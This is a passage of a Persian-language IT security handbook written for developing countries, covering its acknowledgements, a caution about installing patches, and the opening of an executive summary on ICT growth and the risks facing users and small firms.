ﻫﺰﺍﺭ ﻋﻨﻮﺍﻥ ﺍﺯ ﻛﺘﺎﺑﻬﺎﻱ ﻓﻨﻲ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻣﺮﺩﻡ ﻛﺸﻮﺭﻫﺎﻱ
ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺍﺳﺖ .ﺧﻮﺍﻧﻨﺪﮔﺎﻧﻲ ﻛﻪ ﻭﺿﻌﻴﺖ ﻛﺘﺎﺑﻬﺎ ﻭ
ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻄﺎﻟﺐ ﻣﻨﺘﺸﺮ ﺷﺪﻩ ﺩﺭ ﺟﻬـﺎﻥ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺭﺍ
ﺩﻳﺪﻩﺍﻧﺪ ﻣﻲﺩﺍﻧﻨﺪ ﻛﻪ ﻣﺸﺎﺭﻛﺖ ﺍﻭﺭﻟﻲ ﺩﺭ ﺳﻴﺮ ﺗﻮﺍﻧﻤﻨـﺪﻱ ﻋﻠﻤـﻲ
ﺍﻳﻦ ﻛﺸﻮﺭﻫﺎ ﺟﻬﺖ ﺁﺷﻨﺎﻳﻲ ،ﭘﺨﺶ ﻭ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ
ﻟﺬﺍ ﻛﺎﻫﺶ ﺷﻜﺎﻑ ﺩﻳﺠﻴﺘﺎﻟﻲ ﭼﻘﺪﺭ ﻣﺆﺛﺮ ﻭ ﺣـﺎﺋﺰ ﺍﻫﻤﻴـﺖ ﺑـﻮﺩﻩ
ﺍﺳﺖ.
ﺑﺮ ﺧﻮﺩ ﻻﺯﻡ ﻣﻲﺩﺍﻧﻴﻢ ﺍﺯ ﮔﺮﺩﺁﻭﺭﻧﺪﮔﺎﻥ ﻛﺘﺎﺑﻬﺎﻱ ﻓﻮﻕﺍﻟﺬﻛﺮ ﺑﺮﺍﻱ
ﻛﻤــﻚ ﺷﺎﻳــﺴﺘﻪ ﻭ ﻣــﺸﺘﺎﻗﺎﻧﻪ ﺟﻬــﺖ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻄﺎﻟــﺐ
ﻛﺘﺎﺑﻬﺎﻳﺸﺎﻥ ﺩﺭ ﺑﺨﺸﻬﺎﻳﻲ ﺍﺯ ﺍﻳﻦ ﻛﺘﺎﺏ ﺭﺍﻫﻨﻤﺎ ﺑﻪ ﮔﺮﻣﻲ ﺗـﺸﻜﺮ
ﻛﻨﻴﻢ .ﺷﻮﺭ ﻭ ﺍﺷﺘﻴﺎﻕ ﺁﻧﺎﻥ ﺑﺮﺍﻱ ﻛﻤﻚ ﺑـﻪ ﺍﻧﺘـﺸﺎﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ
ﺭﺍﻫﻨﻤﺎ ﺑﻬﺘﺮﻳﻦ ﻧﻤﻮﻧﺔ ﻫﻤﻜﺎﺭﻱ ﺗﺨﺼﺼﻲ ﻭ ﺑﻪﺍﺷـﺘﺮﺍﻙﮔـﺬﺍﺭﻱ
ﻲ ﺍﻣﺮﻭﺯ ﺍﺳﺖ.
ﻦ ﺍﻳﻨﺘﺮﻧﺘ ﹺ
ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺗﻤﺪﻥ ﻧﻮﻳ ﹺ
ﺩﺭ ﺍﻳﻨﺠﺎ ﻻﺯﻡ ﻣـﻲﺩﺍﻧـﻴﻢ ﺍﺯ ﺗـﺎﻡ ﻛﻠـﺮﻣﻦ ،٢٤ﻣﺘﺨـﺼﺺ ﺍﺭﺷـﺪ
ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺓ ﺩﺍﺩﻩﻫﺎ ٢٥ﺩﺭ ﺗﻴﻢ ﺍﻣﻨﻴﺖ ﺧﺰﺍﻧﺔ ﺑﺨﺶ ﺳﻴﺎﺳﺖ
Bruno Lanvin
Jacquelin Dubow
Ellie Alavi
Teri Nachazel
Heriri Bretadeau
O’Reilly & Associates
rd
Practical Unix and Internet Security 3 Edition
Gene Spafford
Alan Schwartz
Web Security, Privacy & Commerce
Tom Kellermann
14
15
16
17
18
19
20
21
22
23
24
ﻋﻤﻠﻴﺎﺗﻲ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ٢٦ﻧﻴﺰ ﺗﺸﻜﺮ ﻧﻤﺎﻳﻴﻢ .ﻧﻮﺷﺘﻪ ﻫـﺎﻱ ﻭﻱ ﺩﺭ
ﻣﻮﺭﺩ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ،٢٧ﺗﻬﺪﻳـﺪﺍﺕ ﭼﻨـﺪﻭﺟﻬﻲ ٢٨ﻭ
ﻣﺪﻳﺮﻳﺖ ﺧﻄﺮ ﺳﻴﺎﺭ ٢٩ﺩﺭ ﺑﺨﺶ ﺳﻮﻡ ﺍﻳﻦ ﻛﺘﺎﺏ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ
ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ.
ﻣﺎﻛﺲ ﺍﺷﻨﻠﻤﻦ ٣٠ﻧﻤﺎﻳﻨﺪﺓ ﺳﻮﺋﻴﺲ ﺩﺭ ﻛﻤﻴﺘﺔ ﺗﻮﺳﻌﺔ ﺍﻃﻼﻋـﺎﺕ
ﺩﺭ ﺍﺟﻼﺱ ﭼﺎﻧﮓ ﻛـﻴﻦ ٣١ﭼـﻴﻦ ﺩﺭ ﺳـﺎﻝ ۲۰۰۲ﻧﻴـﺰ ﻳﻜـﻲ ﺍﺯ
ﺍﻭﻟﻴﻦ ﻛﺴﺎﻧﻲ ﺑﻮﺩ ﻛﻪ ﺍﻫﻤﻴﺖ ﻭ ﻓﺎﻳﺪﺓ ﺩﺳﺘﻨﺎﻣﺔ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ
ﺍﻃﻼﻋــﺎﺕ ﺩﺭ ﻛــﺸﻮﺭﻫﺎﻱ ﺩﺭﺣــﺎﻝ ﺗﻮﺳــﻌﻪ ﺭﺍ ﺗــﺸﺨﻴﺺ ﺩﺍﺩ ﻭ
ﭘﺸﺘﻴﺒﺎﻧﻴﻬﺎ ﻭ ﺗﻮﺻﻴﻪﻫﺎﻱ ﺍﻭ ﺑﻮﺩ ﻛﻪ ﺑﻪ ﺣﻤﺎﻳﺖ ﺩﻭﻟﺖ ﺳﻮﺋﻴﺲ ﺍﺯ
infoDevﺑﺮﺍﻱ ﺍﻧﺘﺸﺎﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﻧﺠﺎﻣﻴﺪ ﻭ ﻣﺎ ﺩﺭ ﺍﻳﻨﺠـﺎ ﺍﻳـﻦ
ﭘﺸﺘﻴﺒﺎﻧﻲ ﻭﻱ ﺭﺍ ﻣﻮﺭﺩ ﺗﻘﺪﻳﺮ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ.
ﻣﺎﻳﻜﻞ ﻣﻜﻠـﻲ ٣٢ﻧﻴـﺰ ﮔﺮﻭﻫـﻲ ﺍﺯ ﻣﺘﺨﺼـﺼﻴﻦ ﻓﻌـﺎﻝ ﺭﺍ ﺑـﺮﺍﻱ
ﺗﺪﻭﻳﻦ ﻣﻄﺎﻟﺐ ﺍﻳﻦ ﻛﺘﺎﺏ ﺗﺸﻜﻴﻞ ﺩﺍﺩ ﻭ ﻫﻤﻴﻦ ﺍﻓﺮﺍﺩ ﺑﻮﺩﻧـﺪ ﻛـﻪ
ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺍﺭﺯﺷﻤﻨﺪﻱ ﺑﺮﺍﻱ ﺍﻓـﺰﺍﻳﺶ ﺩﻗـﺖ ﻭ ﺗﻨﺎﺳـﺐ ﻧـﺴﺨﺔ
ﻧﻬﺎﻳﻲ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺭﺍﺋﻪ ﻛﺮﺩﻧﺪ؛ ﻭ ﻣـﺎ ﺩﺭ ﺍﻳﻨﺠـﺎ ﺍﺯ ﺭﺍﻫﻨﻤﺎﻳﻴﻬـﺎﻱ
ﺳﺎﺯﻧﺪﺓ ﺍﻳﺸﺎﻥ ﺗﺸﻜﺮ ﻣـﻲﻛﻨـﻴﻢ؛ ﻭ ﻫﻤﭽﻨـﻴﻦ ﻣﺮﺍﺗـﺐ ﺗـﺸﻜﺮ ﻭ
ﺍﻣﺘﻨﺎﻥ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺗﻤﺎﻣﻲ ﺩﺳﺖﺍﻧﺪﻛﺎﺭﺍﻥ ﻭ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑـﻪ ﺭﻭﻧـﺪ
ﭼﺎﭖ ﺍﻳﻦ ﻛﺘﺎﺏ ﻛﻤﻚ ﻛﺮﺩﻧﺪ ﺍﻋﻼﻡ ﻣﻲﻧﻤﺎﻳﻴﻢ.
ﺍﻳﻦ ﻛﺘﺎﺏ ﻧﻪ ﻣﺮﺟﻌﻲ ﺁﻣﻮﺯﺷـﻲ ﺑـﺮﺍﻱ ﺳﻴـﺴﺘﻢ ﻋﺎﻣﻠﻬـﺎﻱ
Windows ،Unixﻳــﺎ Macintoshﺍﺳــﺖ ﻭ ﻧــﻪ ﻣﺮﺟﻌــﻲ
ﺑﺮﺍﻱ ﺁﻣﻮﺯﺵ ﺭﺍﻫﺒﺮﻱ ﺳﻴﺴﺘﻢ؛ ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﺩﺭ ﻛﻨـﺎﺭ ﺭﺍﻫﻨﻤﺎﻫـﺎﻱ
ﺭﺍﻫﺒﺮﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ.
ﻣﺪﻳﺮﻳﺖ ﺗﻐﻴﻴﺮﺍﺕ ﻭﺳﻴﻊ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﻛﻨﺪ ،ﺣﺘﻲ ﺍﮔـﺮ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮﺍﺕ
ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﻻﺯﻡ ﺑﺎﺷﻨﺪ .ﺑﺮﺍﻱ ﺭﺍﺣﺘﻲ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ
ﺑﻪ ﻣﻨﺎﺑﻊ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺴﻴﺎﺭﻱ ﺍﺷﺎﺭﻩ ﻛﺮﺩﻩﺍﻳﻢ ،ﻭﻟﻲ ﺍﮔﺮ ﺧﻮﺍﻧﻨـﺪﮔﺎﻥ
ﺍﺯ ﺑﺮﻧﺎﻣﻪ ﻫﺎ ﻭ ﻭﺻﻠﻪﻫﺎﻱ ٣٣ﭘﻴﺸﻨﻬﺎﺩﻱ ﻣﻮﺟﻮﺩ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﻨﺪ ﺑﺎﻳﺪ ﺟﺎﻧﺐ ﺍﺣﺘﻴﺎﻁ ﺭﺍ ﺭﻋﺎﻳﺖ ﻛﻨﻨﺪ؛ ﭼﺮﺍﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ
ﺑﻌﺪ ﺍﺯ ﺍﻳﺠـﺎﺩ ﺗﻐﻴﻴـﺮﺍﺕ ﺩﺭ ﻫـﺴﺘﻪ ،٣٤ﻣﻌﻤـﺎﺭﻱ ﻭ ﻳـﺎ ﺩﺳـﺘﻮﺭﺍﺕ
ﻲ ﺁﻧﻬﺎ ﺩﺭ ﺳﻄﺢ ﻛﻼﻥ ﺑﺴﺎﺩﮔﻲ
ﻲ ﺗﺄﺛﻴﺮﺍﺕ ﺍﻣﻨﻴﺘ ﹺ
ﺳﻴﺴﺘﻤﻬﺎ ،ﺍﺭﺯﻳﺎﺑ ﹺ
Senior Data Risk Management Specialist
Integrator Group and Treasury Security Team
of the Operations Policy Department
E-Finance
Blended Threats
Mobile Risk Management
Max Schnellmann
Chongqing
Michel Maechley
Patches
Kernel
25
26
27
28
29
30
31
32
33
34
١٨
ﻣﻴﺴﺮ ﻧﺒﺎﺷﺪ .ﺍﮔﺮ ﺭﺍﻩﺣﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻓﺮﻭﺷﻨﺪﻩﻫـﺎﻱ ﻣﺨﺘﻠـﻒ
ﺑﻄﻮﺭ ﻋـﺎﺩﻱ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﻳـﺎ ﻧـﺼﺐ ﺷـﻮﻧﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ
ﺩﺭﺍﺯﻣﺪﺕ ﺳﻄﺢ ﻛﻠـﻲ ﺍﻣﻨﻴـﺖ ﺗـﻀﻌﻴﻒ ﮔـﺮﺩﺩ؛ ﭘـﺲ ﺑﺎﻳـﺪ ﺑـﻪ
ﺳﺎﺯﮔﺎﺭﻱ ﺗﺠﻬﻴﺰﺍﺕ ﺳﻴﺴﺘﻢ ﻭ ﻛﻴﻔﻴﺖ ﻭ ﺍﺷﺘﻬﺎﺭ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛـﻪ
ﺧﺪﻣﺎﺕ ﻓﻨﻲ ﻭ ﻣﺸﺎﻭﺭﻩﺍﻱ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ ﻧﻴﺰ ﺗﻮﺟﻪ ﻛﺮﺩ.
ﺍﻣﻴﺪﻭﺍﺭﻳﻢ ﻛﺘﺎﺏ ﺣﺎﺿﺮ ﺩﺭﻙ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺭﺍ ﺑﺮﺍﻱ ﺷﻤﺎ ﺁﺳـﺎﻥﺗـﺮ
ﻛﻨﺪ ﻭ ﻣﻄﻤﺌﻦ ﻫﺴﺘﻴﻢ ﻛـﻪ ﺧﻮﺍﻧﻨـﺪﮔﺎﻥ ﻧﻴـﺰ ﺑـﻪ ﺑﻬﺒـﻮﺩ ﻛﻴﻔـﻲ
ﻣﺤﺘﻮﻳﺎﺕ ﺁﻥ ﺩﺭ ﺁﻳﻨﺪﻩ ﻛﻤﻚ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺧﻼﺻﻪ ﺍﺟﺮﺍﻳﻲ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ،ﺭﺍﻫﻨﻤﺎﻳﻲ ﻛـﺎﺭﺑﺮﺩﻱ ﺟﻬـﺖ
ﻓﻬﻢ ﻭ ﺍﺟﺮﺍﻱ ﮔﺎﻣﻬﺎﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﻣﻨﻴﺖ ﺩﺭ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﺣﻮﺯﺓ
ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻨﺰﻝ ﻭ ﻣﺤﻞ ﻛﺎﺭ ﺷﻤﺎ ﺍﺳﺖ .ﮔﺮﭼـﻪ ﺍﻳـﻦ
ﻛﺘﺎﺏ ﺑﻬﺘـﺮﻳﻦ ﻭ ﻧـﻮﻳﻦﺗـﺮﻳﻦ ﺭﺍﻫﻜﺎﺭﻫـﺎ ﺭﺍ ﺩﺭ ﺯﻣﻴﻨـﺔ ﻓﻨـﺎﻭﺭﻱ
ﺍﻃﻼﻋــﺎﺕ ﺍﺭﺍﺋــﻪ ﻣــﻲﺩﻫــﺪ ،ﺍﻣــﺎ ﺩﺭ ﺍﺻــﻞ ﺑــﺮﺍﻱ ﺧﻮﺍﻧﻨــﺪﮔﺎﻥ
ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻳﻦ ﻛﺘـﺎﺏ ﻋـﻼﻭﻩ
ﻲ ﻣﻮﺟـﻮﺩ
ﺑﺮ ﺍﺭﺍﺋﻪ ﺧﻼﺻﻪﺍﻱ ﺍﺯ ﺗﻬﺪﻳﺪﺍﺕ ﻓﻴﺰﻳﻜﻲ ﻭ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـ ﹺ
ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ،ﺑـﻪ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﻣـﺪﻳﺮﻳﺘﻲ،
ﻣﺤﻴﻄﻬﺎﻱ ﺿﺎﺑﻄﻪﻣﻨﺪ ﻭ ﺍﻟﮕﻮﻫﺎﻱ ﻣﺸﺎﺭﻛﺖ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻫﻤﻜﺎﺭ
ﻣﻲﭘﺮﺩﺍﺯﺩ ﻛـﻪ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﺩﺭ ﺑﺎﺯﺍﺭﻫـﺎ ،ﺩﻭﻟﺘﻬـﺎ ،ﻣﺆﺳـﺴﺎﺕ
ﺣﺮﻓﻪﺍﻱ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ .ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺯ ﭘﻨﺞ
ﺑﺨﺶ ﺗﺸﻜﻴﻞ ﺷﺪﻩ ﻛﻪ ﻫﺮﻳﻚ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺼﻮﺭﺕ ﻣـﺴﺘﻘﻞ ﺍﺯ
ﺩﻳﮕﺮﻱ ﻣﻄﺎﻟﻌﻪ ﻛﺮﺩ.
ﺍﻳﻦ ﺧﻼﺻﺔ ﺍﺟﺮﺍﻳﻲ ﻣﻮﺿﻮﻋﺎﺕ ﺍﺻﻠﻲ ﻛﺘﺎﺏ ﺭﺍ ﭘﻮﺷـﺶ ﺩﺍﺩﻩ ﻭ
ﺩﺭ ﻗﺴﻤﺘﻲ ﺑﺎ ﻋﻨﻮﺍﻥ "ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﮐﺘﺎﺏ" ﺗﺼﻮﻳﺮﻱ ﻛﻠﻲ ﺍﺯ ﻫﺮ
ﺑﺨﺶ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ.
ﺳﺎﺯﮔﺎﺭﺳﺎﺯﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ
ﺩﺭ ﺣﺎﻝ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ
ﺍﻳﻦ ﻛﺘﺎﺏ ﺩﺭ ﺍﺑﺘﺪﺍ ﻣﺮﻭﺭﻱ ﺑﺮ ﺭﺷﺪ ﺑﺨﺶ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ
ﺍﺭﺗﺒﺎﻃﺎﺕ ) (ICTﺩﺍﺭﺩ .ﺍﻳﻦ ﺭﺷﺪ ﻭ ﺍﺭﺗﻘﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻋـﺎﺩﻱ ICTﺭﺍ
ﺩﺭ ﺑﺮ ﻣﻲ ﮔﻴﺮﺩ ﻭ ﺍﺯ ﺍﻓﺰﺍﻳﺶ ﺗﻌﺪﺍﺩ ﺷﺒﻜﻪﻫـﺎﻱ ﺧـﺎﻧﮕﻲ ﻭ ﺭﺷـﺪ
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ) - ١(SMEsﻛﻪ ﺑﺮﺍﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ
ﺍﺯ ﺑﺎﺯﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺑﻪ ﺷﺪﺕ ﺑﻪ ﺗﻮﺳﻌﺔ ﻓﻨﺎﻭﺭﻱ ﻭ ﺑﻜﺎﺭﮔﻴﺮﻱ ﺁﻥ ﺩﺭ
ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻭﺍﺑﺴﺘﻪﺍﻧﺪ ﻣﺘﻜﻲ ﺑﻪ ﻣﻨﺎﺑﻊ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣـﻲﺑﺎﺷـﻨﺪ -
ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺁﻥ ﭘﻲ ﺑﺮﺩ.
ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺍﺯ ﺳﻮﺍﺑﻖ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ
ﺗﺄﻣﻴـﻦ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺗﻮﺳﻌﺔ ﺑﺎﺯﺍﺭ ﻣﺤـﺼﻮﻻﺕ ﻭ ﺧـﺪﻣﺎﺕ ﻓﻨـﺎﻭﺭﻱ ﺩﺭ ﺩﻭ
ﺳﻄﺢ ﻓﺮﺩﻱ ﻭ ﺳﺎﺯﻣﺎﻧﻲ ﭼﺸﻤــﮕﻴﺮ ﺍﺳﺖ ،ﺍﻃﻼﻉ ﺍﺯ ﻣﺒﺎﺣـــﺚ
Small and Medium Sized Enterprises
1
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ﻭ ﻣﻬﻢ ﻣـﻲﺑﺎﺷـﺪ .ﻣﻤﻜـﻦ
ﺍﺳﺖ ﻛﺎﺭﺑﺮﺍﻥ ﻓﺮﺩﻱ ﺩﺭ ﻣﻮﺭﺩ ﺧﻄﺮﺍﺗﻲ ﻛـﻪ ﻫﻨﮕـﺎﻡ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺍﻳﻨﺘـﺮﻧﺖ ﻣﺘﻮﺟﻪ ﺁﻧﻬﺎ ﺍﺳﺖ ﻣﻄﻠﻊ ﻧﺒﺎﺷﻨﺪ .ﺍﮔﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺧﻄـﺮﺍﺕ
ﺷﺒﻜﻪﻫﺎﻱ ﺣﻔﺎﻇﺖﻧﺸﺪﻩ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻨـﺪ ،ﺑـﺎﺯ ﻫـﻢ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﻳﺎﺩﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺩﻳـﻮﺍﺭﻩ ﻫـﺎﻱ ﺁﺗـﺶ ،٢ﻭﻳـﺮﻭﺱﻳﺎﺑﻬـﺎ،٣
ﺭﻣﺰﮔﺬﺍﺭﻱ ٤ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﻗﺎﻋـﺪﻩﻣﻨـﺪ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺑـﻪ ﺩﻟﻴـﻞ
ﻫﺰﻳﻨﻪ ﻭ ﻭﻗﺘﻲ ﻛﻪ ﺍﺯ ﺁﻧﻬـﺎ ﻣـﻲﮔﻴـﺮﺩ ﻭ ﺗﻐﻴﻴـﺮﻱ ﻛـﻪ ﺩﺭ ﺭﻓﺘـﺎﺭ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺁﻧﻬﺎ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ ﺑﻪ ﺗﻌﻮﻳﻖ ﺑﻴﺎﻧﺪﺍﺯﻧﺪ .ﻋﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻳﻚ ﺭﺍﻩﺣﻞ ﻓﻨـﻲ
ﻧﻈﻴﺮ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻨﺪ ﻭ ﺑﻪ ﻃﺒﻘﻪﺑﻨﺪﻱ ﺳﻄﻮﺡ ﺍﻣﻨﻴﺖ
ﺗﻮﺟﻬﻲ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻭ ﻧﺪﺍﻧﻨﺪ ﻛﻪ ﺑﺪﻭﻥ ﺗﻮﺟـﻪ ﺑـﻪ ﺁﻥ ،ﺍﻣﻨﻴـﺖ
ﺳﻴﺴﺘﻢ ﺑﻪ ﺷﺪﺕ ﺩﭼﺎﺭ ﻣﺨﺎﻃﺮﻩ ﺍﺳﺖ .ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﺑﻪ ﺩﻻﻳﻞ ﻣﺨﺘﻠﻒ ﺍﻳﻤﻦ ﺳﺎﺧﺘﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑـﻪ ﺗـﺄﺧﻴﺮ
ﺑﻴﺎﻧﺪﺍﺯﻧﺪ ﻭ ﺩﺭ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺷﻔﺎﻑ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻭ
ﻣﺪﻳﺮﺍﻥ ﻧﻴﺰ ﻛﻮﺗﺎﻫﻲ ﻛﻨﻨﺪ .ﺍﮔـﺮ ﺍﺭﺗﺒﺎﻃـﺎﺕ ،ﺁﮔـﺎﻫﻲ ﻭ ﺁﻣـﻮﺯﺵ
ﻣﻨﺎﺳﺐ ﺩﺭ ﺳﺎﺯﻣﺎﻥ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﺗﺒﻬﻜﺎﺭﺍﻥ ﻣﻤﻜﻦ ﺍﺳـﺖ
ﺑﻪ ﺁﺳﺎﻧﻲ ﺣﻔﺎﻇﻬﺎﻱ ﻓﻨﻲ ﺭﺍ ﭘﺸﺖ ﺳﺮ ﺑﮕﺬﺍﺭﻧﺪ.
ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻣﺘﻐﻴﺮ:
ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺳﻴـﺎﺭ ،ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻫﺎﻱ ﺭﺍﻳـﺞ ﻛﺎﺭﺑﺮﺩﻱ،
ﻭ ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﻣﻮﺟﺐ ﺍﻳﺠﺎﺩ ﭘﻴﭽﻴﺪﮔﻲ ﻣﻲﺷﻮﻧﺪ
ﺩﺭ ﺣﺎﻝ ﺣﺎﺿﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺟﺪﻳﺪ ﻭ ﻏﻴﺮﻣﺘﺨﺼﺺ ﺗﻨﻬﺎ ﻋﻠﺖ ﻧﻘـﺾ
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻧﻴﺴﺘﻨﺪ .ﻣﺤـﻴﻂ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ
ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﺎ ﭘﻴﺪﺍﻳﺶ ﻣﺤﺼﻮﻻﺕ ﺟﺪﻳﺪ ﺧـﺼﻮﺻﹰﺎ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ
ﺳــﻴﺎﺭ )ﻣﺎﻧﻨــﺪ ﺭﺍﻳﺎﻧــﻪﻫــﺎﻱ ﻛﻴﻔــﻲ ،ﺗﻠﻔﻨﻬــﺎﻱ ﻫﻤــﺮﺍﻩ ﻭ PDAﻫــﺎ (٥ﻛــﻪ
ﭼﺎﻟﺸﻬﺎﻱ ﻣﺘﻔـﺎﻭﺗﻲ ﺭﺍ ﺩﺭ ﺯﻳﺮﺳـﺎﺧﺖ ﻭ ﺍﻣﻨﻴـﺖ ﺩﺍﺩﻩﻫـﺎ ﺍﻳﺠـﺎﺩ
